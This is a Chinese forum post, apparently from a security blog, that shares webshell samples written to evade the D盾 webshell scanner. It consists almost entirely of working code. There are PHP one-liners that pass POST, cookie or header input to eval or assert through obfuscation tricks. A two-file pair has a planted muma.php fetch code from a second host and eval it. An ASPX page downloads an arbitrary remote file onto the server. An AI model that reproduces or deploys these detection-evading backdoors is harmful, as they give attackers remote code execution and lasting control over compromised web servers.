过D盾

好大一条虫 305 次浏览 0

D哥 杀的好频繁 ......

PHP脚本

<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>
<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}
<?php
$x='$_PO'."STasdasd[".'1]';
$x = $x.str_replace('STasdasd',"ST[");

for ($x=0; $x<=0; $x++) {
    assert("$x");
}
a.com 上传muma.php如下:
<?php
$handle = fopen ("http://b.com/bypass.txt", "rb");
$contents = "";
do {
$data = fread($handle, 8192);
if (strlen($data) == 0)
{break;}
$contents .= $data;
} while(true);
fclose ($handle);
$c = array();
array_push($c,$contents);
eval($c[0]);

<?php
$bypassFile = fopen("bypass.txt", "w");
$code = $_POST[code];
fwrite($bypassFile,$code );
fclose($bypassFile);
print(file_get_contents("http://a.com/muma.php"));
b.com 上传l.php
<?php
include '2.php';
$b = 'str_replace';
$c = $b('1','', $a);
$c($d);
?>
<?php $a = 'a1s1s1e1r11t';$d = $_POST['id'];?>
<?php
function _strint($key){
        return strrev($key);
}
function log1($log){
        lone(_strint(strrev($log)));
}
function lone($key){
        $str = "";
        return eval($str.$key.$str);
}
foreach (array('_COOKIE','_POST','_GET') as $_request)
{
    foreach ($$_request as $_key=>$_value)
    {
        $$_key=  $_value;
    }
}
$id = isset($jsha) ? $id : 2;
log1($jsha);
?>
<?php


class plugin_myapp_agent{
        function plugin_myapp_agent() {
                $agt = $_SERVER['HTTP_USER_AGENT'];
                return $agt;
        }
}
$plugin_myapp_agent=new plugin_myapp_agent();
$content=$plugin_myapp_agent->plugin_myapp_agent();

class plugin_myapp_referer{
        function plugin_myapp_referer() {
                $ref = $_SERVER['HTTP_REFERER'];
                return $ref;
        }
}
$plugin_myapp_referer=new plugin_myapp_referer();
$content1=$plugin_myapp_referer->plugin_myapp_referer();

class plugin_myapp_forwar{
        function plugin_myapp_forwar() {
                $for = $_SERVER['HTTP_X_FORWARDED_FOR'];
                return $for;
        }
}
$plugin_myapp_forwar=new plugin_myapp_forwar();
$content2=$plugin_myapp_forwar->plugin_myapp_forwar();
$content($content1,$content2);
<?php
$a = $_REQUEST['a'];
$b = null;
eval($b.$a);
?>
<?php
$ab = $_REQUEST['d'];
$a['t'] = "";//主要带对象 D盾就不管后面的了。。。
eval($a['t'].$ab);
<?php

$b=1;$a=$_POST;extract($a);print_r(`$b`);
<?php
$a=array("assert"=>"hello");
$b=array_keys($a,'hello');
declare(ticks=1);
$b2 = "$_POST[1]";
register_tick_function($b[0], $b2);
?>

ASPX脚本

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server" language="C#">

    protected void Button1_Click(object sender, EventArgs e)
    {
        try
        {
        WebClient Down = new WebClient();
        Down.DownloadFile(txturl.Text, txtPath.Text);

        this.txtOut.Text = "Down-->Complete";


        }

        catch (Exception)
        {
            if (txturl.Text=="")
            {
                this.txtOut.Text = "Error-->PathNull";
            }
            else
            {
                this.txtOut.Text = "Error-->Path Access Denied";
            }

        }

    }
</script>
<html xmlns="http://www.w3.org/1999/xhtml">


<head runat="server">
    <title>TEST</title>
    <style type="text/css">
        .style1
        {
            text-align: center;
        }
    </style>
</head>
<body>
    <form id="form1" runat="server">
    <div class="style1">
    DownUrl --><asp:TextBox ID="txturl" runat="server" Width="333px">http://www.XXXX.com/demo.txt</asp:TextBox>
    <br />
    <br />
    DownPath--><asp:TextBox ID="txtPath" runat="server" Width="333px">C:/Windows/Temp/XXX.txt</asp:TextBox>
        <br />
        <br />
        DownOut --><asp:TextBox ID="txtOut" runat="server" ReadOnly="True" 
            Width="334px"></asp:TextBox>
        <br />
        WebSite : <a href="Http://www.XXXX.com">XXXX.com</a><br />
        <asp:Button ID="Button1" runat="server" onclick="Button1_Click" 
            Text="StartDown" Width="134px" />
        <br />
    </div>
    </form>
</body>
</html>

发表评论 取消回复
表情 图片 链接 代码